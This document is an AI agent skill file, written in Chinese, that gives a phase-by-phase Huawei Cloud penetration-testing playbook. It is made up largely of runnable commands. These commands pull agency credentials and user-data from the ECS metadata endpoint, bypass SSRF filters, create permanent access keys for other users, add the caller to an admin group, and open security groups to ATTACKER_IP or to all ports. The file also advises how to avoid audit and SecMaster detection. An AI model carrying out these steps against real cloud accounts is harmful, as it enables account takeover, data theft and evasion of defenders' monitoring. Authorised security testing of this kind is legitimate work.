huawei-pentesting
$
npx mdskill add wgpsec/AboutSecurity/huawei-pentestingExecute Huawei Cloud penetration tests using OpenStack and proprietary APIs.
- Identify and exploit IAM, ECS, OBS, RDS, and container services.
- Integrates OpenStack CLI, obsutil, and REST interfaces.
- Analyzes metadata endpoints and credential types for attack paths.
- Delivers phase-based recommendations for specific cloud services.
SKILL.md
.github/skills/huawei-pentestingView on GitHub ↗
---
name: huawei-pentesting
description: "华为云渗透测试方法论。当目标使用华为云服务、发现 obs.*.myhuaweicloud.com 资产、获取华为云 AK/SK、在 ECS 实例内可访问 169.254.169.254 OpenStack 风格元数据、或需要对华为云 IAM/ECS/OBS/RDS/CCE/FunctionGraph 等服务进行安全评估时使用。覆盖 IAM 提权(OpenStack Keystone)、ECS 接管、OBS 对象存储利用、RDS 数据库攻击、CCE 容器集群、FunctionGraph 函数计算、ELB 负载均衡、LTS 日志、KMS 密钥管理。华为云使用 OpenStack CLI + obsutil + REST API 三种接口"
metadata:
tags: "huawei-cloud,华为云,iam,ecs,obs,rds,cce,functiongraph,lts,elb,kms,openstack,obsutil,myhuaweicloud.com,X-Auth-Token,云渗透"
category: "cloud"
---
# 华为云渗透测试方法论
华为云 IAM/ECS/OBS/RDS/CCE 等服务构成主要攻击面。与 AWS/阿里云/腾讯云最大的不同在于,华为云使用**三种独立的 CLI 接口**(openstack CLI、obsutil、REST API),且其 IAM 基于 OpenStack Keystone 实现,元数据端点使用标准 `169.254.169.254` 但路径为 OpenStack 风格。本技能以渗透阶段(Phase)为主线,从凭据识别到各服务利用,提供完整攻击路径。
## ⛔ 深入参考(必读)
识别到具体攻击服务后,加载对应参考文档获取完整技术细节:
- 计算/存储/数据库详细利用 → 读 [references/compute-storage-attacks.md](references/compute-storage-attacks.md)
- 容器/Serverless/日志/KMS 详细利用 → 读 [references/platform-services-attacks.md](references/platform-services-attacks.md)
---
## Phase 1: 环境识别
拿到华为云相关目标后,首先识别凭据类型、确认可用的 CLI 接口、判断网络位置。
### 1.1 凭据类型
| 凭据类型 | 识别特征 | 有效期 | 获取方式 |
|---|---|---|---|
| 长期 AK/SK | AccessKeyId + SecretAccessKey | 永久(直到手动轮换) | IAM 控制台创建 / 代码泄露 |
| IAM Token | X-Auth-Token(Keystone 风格) | 默认 24 小时 | 用户名密码换取 / AK/SK 签名 |
| 临时安全凭据 | AK/SK + SecurityToken | 15 分钟 ~ 24 小时 | IAM Agency(委托)|
| IAM Agency(委托) | 类似 AWS AssumeRole | 按 Token 有效期 | 跨账号/服务委托 |
### 1.2 三种 CLI 接口(华为云独有)
华为云使用三种不同的命令行接口,这是渗透时必须理解的核心区别:
| 接口 | 覆盖服务 | 认证方式 | 安装 |
|---|---|---|---|
| openstack CLI | IAM / ECS / 安全组 | 环境变量 or `clouds.yaml` | `pip install python-openstackclient` |
| obsutil | OBS 对象存储 | `obsutil config -i AK -k SK -e endpoint` | 华为云官网下载二进制 |
| curl + REST API | RDS / ELB / CCE / FunctionGraph / LTS / KMS | `X-Auth-Token` Header | 系统自带 |
```bash
# openstack CLI 配置(环境变量方式)
export OS_AUTH_URL=https://iam.{region}.myhuaweicloud.com/v3
export OS_PROJECT_NAME={region}
export OS_USERNAME=USERNAME
export OS_PASSWORD=PASSWORD
export OS_DOMAIN_NAME=DOMAIN_NAME
# openstack CLI 配置验证
openstack token issue
# obsutil 配置
obsutil config -i ACCESS_KEY_ID -k SECRET_ACCESS_KEY \
-e https://obs.{region}.myhuaweicloud.com
# obsutil 验证
obsutil ls -limit=1
```
### 1.3 获取 IAM Token(REST API 前置条件)
华为云 REST API 调用需要先通过 IAM 获取 X-Auth-Token:
```bash
# 用户名密码方式获取 Token
curl -X POST "https://iam.{region}.myhuaweicloud.com/v3/auth/tokens" \
-H "Content-Type: application/json" \
-d '{
"auth": {
"identity": {
"methods": ["password"],
"password": {
"user": {
"domain": {"name": "DOMAIN_NAME"},
"name": "USERNAME",
"password": "PASSWORD"
}
}
},
"scope": {
"project": {"name": "{region}"}
}
}
}'
# Token 在响应头 X-Subject-Token 中返回,有效期默认 24 小时
TOKEN=$(curl -sI ... | grep X-Subject-Token | awk '{print $2}' | tr -d '\r')
# 如果有 AK/SK 但无用户名密码
# 华为云 AK/SK 签名较复杂,建议使用 SDK
pip install huaweicloudsdkcore huaweicloudsdkiam
```
### 1.4 元数据端点
华为云 ECS 元数据端点使用标准 IP `169.254.169.254`,但路径为 OpenStack 风格:
```bash
# 判断是否在 ECS 实例内部
curl -s http://169.254.169.254/openstack/latest/meta_data.json
# 获取实例绑定的 IAM Agency 凭据
curl -s http://169.254.169.254/openstack/latest/securitykey
# 获取实例 ID 和项目 ID
curl -s http://169.254.169.254/openstack/latest/meta_data.json | python3 -m json.tool
# 关注字段: uuid (实例 ID), project_id, availability_zone
# 获取 User-Data(可能包含初始化脚本中的凭据)
curl -s http://169.254.169.254/openstack/latest/user_data
```
**注意:** 华为云元数据 IP 与 AWS 相同(`169.254.169.254`),但路径使用 OpenStack 格式(`/openstack/latest/`)。部分 SSRF 防护如果仅阻止 AWS 路径 `/latest/meta-data/` 但未阻止 OpenStack 路径,仍然可以利用。
### 1.5 对象存储 URL 格式
```
公网访问: https://{bucket}.obs.{region}.myhuaweicloud.com/{object}
```
发现 `obs.*.myhuaweicloud.com` 域名即可确认目标使用华为云 OBS。Bucket 名称全局唯一。
### 1.6 区域编码
| 区域代码 | 位置 | 备注 |
|---|---|---|
| cn-north-4 | 华北-北京四 | 最常用区域 |
| cn-north-1 | 华北-北京一 | |
| cn-east-3 | 华东-上海一 | |
| cn-east-2 | 华东-上海二 | |
| cn-south-1 | 华南-广州 | |
| cn-southwest-2 | 西南-贵阳一 | |
| ap-southeast-1 | 亚太-香港 | 无需备案 |
| ap-southeast-3 | 亚太-新加坡 | 海外区域 |
枚举时需遍历多个区域。IAM 为全局服务(`iam.myhuaweicloud.com`),ECS/OBS/RDS 等需逐区域操作。
### 1.7 IAM 身份模型
华为云 IAM 基于 OpenStack Keystone,使用 Domain / Project / User 三级层级:
| 概念 | 华为云 IAM | AWS IAM |
|---|---|---|
| 顶级账号 | Domain(域,含 Domain ID) | Account(含 Account ID) |
| 项目/区域隔离 | Project(每个区域一个 Project) | 无直接对应(Region 概念) |
| 用户 | User(属于 Domain) | IAM User |
| 角色/委托 | Agency(委托,类似 AssumeRole) | IAM Role |
| 用户组 | Group(绑定权限后用户继承) | IAM Group |
```bash
# 查看当前用户信息 [openstack]
openstack user show $(openstack token issue -f value -c user_id)
# 列出所有用户 [openstack]
openstack user list
# 查看角色分配 [openstack]
openstack role assignment list --user USER_ID --project PROJECT_ID
```
---
## Phase 2: 攻击决策树
根据当前持有的凭据/位置,判断攻击路径(每个分支标注使用的接口):
```
当前持有什么?
├── 无凭据
│ ├── 有目标域名 → OBS Bucket 枚举 [curl](猜解 bucket 名 + 公开访问检测)
│ ├── 有 SSRF 漏洞 → 打 http://169.254.169.254/openstack/latest/ [curl]
│ └── 仅知组织名 → OSINT + OBS/子域名枚举 [curl]
│
├── 有 AK/SK
│ ├── 配置 openstack CLI + obsutil + 获取 Token
│ ├── 验证: openstack token issue [openstack]
│ ├── 有 IAM 写权限 → Phase 3(IAM 提权)[openstack]
│ ├── 有 ECS 权限 → Phase 4(计算/存储)[openstack]
│ ├── 有 OBS 权限 → Phase 4(对象存储)[obsutil]
│ ├── 有 RDS/ELB 权限 → Phase 4(数据库/LB)[REST API]
│ └── 权限不明 → 逐服务探测(三种接口分别测试)
│
├── 有用户名密码(IAM 账号)
│ ├── 获取 Token: POST /v3/auth/tokens [REST API]
│ ├── 配置 openstack CLI [openstack]
│ └── 根据权限进入对应 Phase
│
├── 在 ECS 实例内部
│ ├── 获取元数据凭据 [curl] → 根据权限进入对应 Phase
│ └── 检查 User-Data 中是否有硬编码凭据 [curl]
│
└── 有容器环境(CCE Pod 内部)
├── 检查 ServiceAccount Token [kubectl]
├── 尝试访问元数据服务 [curl]
└── → Phase 5(容器/Serverless)[REST API + kubectl]
```
---
## Phase 3: IAM 提权速查
华为云 IAM 基于 OpenStack Keystone,使用 openstack CLI 进行操作。
### 3.1 信息收集
```bash
# 列出所有用户 [openstack]
openstack user list
# 查看指定用户详情 [openstack]
openstack user show USER_ID
# 列出角色分配 [openstack]
openstack role assignment list --user USER_ID --project PROJECT_ID
# 列出所有项目(Region 对应的 Project)[openstack]
openstack project list
```
### 3.2 提权路径
| 提权路径 | 所需权限 | 接口 | 操作 |
|---|---|---|---|
| 创建 AK/SK | IAM 凭据管理权限 | REST API | 为高权限用户创建永久访问密钥 |
| 修改用户密码 | `iam:user:setPassword` | openstack | 重置其他用户密码获取其权限 |
| 创建 IAM Agency | `iam:agency:createAgency` | REST API | 创建委托关系获取其他账号权限 |
| 修改用户组 | `iam:group:addUser` | openstack | 将自身加入高权限用户组 |
| PassRole + 创建 ECS | 委托绑定 + ECS 创建 | openstack | 启动绑定高权限 Agency 的 ECS |
| PassRole + 创建 FunctionGraph | 委托绑定 + 函数创建 | REST API | 创建绑定高权限 Agency 的函数 |
```bash
# 提权示例:为高权限用户创建永久 AK/SK [REST API]
curl -X POST "https://iam.{region}.myhuaweicloud.com/v3.0/OS-CREDENTIAL/credentials" \
-H "X-Auth-Token: $TOKEN" \
-H "Content-Type: application/json" \
-d '{"credential": {"user_id": "TARGET_USER_ID", "description": "backup"}}'
# 返回 access (AK) 和 secret (SK)
# 提权示例:将自身加入管理员组 [openstack]
openstack group add user ADMIN_GROUP_ID CURRENT_USER_ID
```
---
## Phase 4: 计算/存储/数据库速查
### ECS 云服务器 [openstack]
```bash
# 列出所有实例
openstack server list --long
# 获取实例详情(关注安全组、绑定 IP、状态)
openstack server show SERVER_ID
```
→ 读 [references/compute-storage-attacks.md](references/compute-storage-attacks.md) 获取 VNC 控制台、密码提取、元数据利用完整流程
### OBS 对象存储 [obsutil]
```bash
# 列出所有 Bucket → 列出对象 → 下载敏感文件
obsutil ls
obsutil ls obs://BUCKET_NAME/ -limit=100
```
→ 读 [references/compute-storage-attacks.md](references/compute-storage-attacks.md) 获取 ACL 修改、批量下载、公开访问检测完整流程
### RDS 数据库 [REST API]
```bash
# 列出数据库实例
curl -X GET "https://rds.{region}.myhuaweicloud.com/v3/{project_id}/instances" \
-H "X-Auth-Token: $TOKEN"
```
→ 读 [references/compute-storage-attacks.md](references/compute-storage-attacks.md) 获取账号创建、备份下载、数据导出完整流程
### ELB 负载均衡 [REST API]
```bash
# 列出负载均衡实例
curl -X GET "https://elb.{region}.myhuaweicloud.com/v2/{project_id}/elb/loadbalancers" \
-H "X-Auth-Token: $TOKEN"
```
→ 读 [references/compute-storage-attacks.md](references/compute-storage-attacks.md) 获取后端篡改、流量劫持完整流程
---
## Phase 5: 容器/Serverless/日志/KMS 速查
### CCE 容器引擎 [REST API + kubectl]
```bash
# 列出集群
curl -X GET "https://cce.{region}.myhuaweicloud.com/api/v3/projects/{project_id}/clusters" \
-H "X-Auth-Token: $TOKEN"
# 获取 kubeconfig 后使用 kubectl 操作集群
```
→ 读 [references/platform-services-attacks.md](references/platform-services-attacks.md) 获取集群接管、kubeconfig 提取、特权 Pod 创建完整流程
### FunctionGraph 函数计算 [REST API]
```bash
# 列出函数(注意 URN 格式)
curl -X GET "https://functiongraph.{region}.myhuaweicloud.com/v2/{project_id}/fgs/functions" \
-H "X-Auth-Token: $TOKEN"
```
→ 读 [references/platform-services-attacks.md](references/platform-services-attacks.md) 获取代码提取、环境变量泄露、函数配置完整流程
### LTS 日志服务 [REST API]
```bash
# 列出日志组
curl -X GET "https://lts.{region}.myhuaweicloud.com/v2/{project_id}/groups" \
-H "X-Auth-Token: $TOKEN"
```
→ 读 [references/platform-services-attacks.md](references/platform-services-attacks.md) 获取敏感日志搜索、批量导出完整流程
### KMS 密钥管理 [REST API]
```bash
# 列出密钥
curl -X GET "https://kms.{region}.myhuaweicloud.com/v1.0/{project_id}/kms/keys" \
-H "X-Auth-Token: $TOKEN"
```
→ 读 [references/platform-services-attacks.md](references/platform-services-attacks.md) 获取密钥枚举、数据解密完整流程
---
## Phase 6: 安全组操控
安全组是华为云 ECS 的网络访问控制层,使用 openstack CLI 操作。
```bash
# 列出所有安全组 [openstack]
openstack security group list
# 查看安全组规则 [openstack]
openstack security group rule list SG_ID
# 添加入方向规则 — 仅开放攻击者 IP 的 SSH [openstack]
openstack security group rule create --proto tcp --dst-port 22 \
--remote-ip ATTACKER_IP/32 SG_ID
# 危险操作 — 开放所有端口(极高告警风险)[openstack]
openstack security group rule create --proto tcp --dst-port 1:65535 \
--remote-ip 0.0.0.0/0 SG_ID
```
**判断依据:** 仅在需要建立反向连接或直接访问内部服务时操作安全组。优先使用最小端口范围 + 指定源 IP,避免触发安全云脑(SecMaster)告警。
---
## 工具速查
| 工具 | 用途 | 接口类型 | 安装/使用 |
|---|---|---|---|
| openstack CLI | IAM/ECS/安全组操作 | openstack | `pip install python-openstackclient` |
| obsutil | OBS 对象存储操作 | obsutil | 华为云官网下载二进制 |
| curl | REST API 调用 + 元数据探测 | REST API | 系统自带 |
| hcloud CLI | 华为云官方 CLI(部分场景替代 curl) | REST API | 华为云官网下载 |
| kubectl | CCE 集群操作 | kubectl | 获取 kubeconfig 后使用 |
| huaweicloudsdkcore | Python SDK(AK/SK 签名) | SDK | `pip install huaweicloudsdkcore` |
## 注意事项
**CTS 审计感知:** 华为云 CTS(Cloud Trace Service)记录管理事件 API 调用(类似 AWS CloudTrail)。以下操作产生高可见性日志:
- IAM 变更(创建用户、创建 AK/SK、修改用户组)
- Agency(委托)创建与修改
- 安全组规则变更
**安全云脑检测:** 华为云安全云脑(SecMaster)会检测:
- AK/SK 异常调用(异常 IP、异常时间、异常 API 频率)
- ECS 异常登录(非常用地域 IP)
- 安全组规则异常开放
- OBS Bucket ACL 变更为公开
**速率限制:** 华为云 API 有限流机制,枚举时建议控制频率。触发限流返回 HTTP 429 或 `APIGW` 错误。
**区域遍历:** 华为云资源按区域隔离。IAM 为全局服务,但 ECS/OBS/RDS 等需逐区域枚举。注意:每个区域对应一个独立的 OpenStack Project。
**三种接口的认证隔离:** openstack CLI 使用环境变量认证,obsutil 使用独立的 AK/SK 配置,REST API 使用 X-Auth-Token。切换区域时三种工具的配置需要分别更新。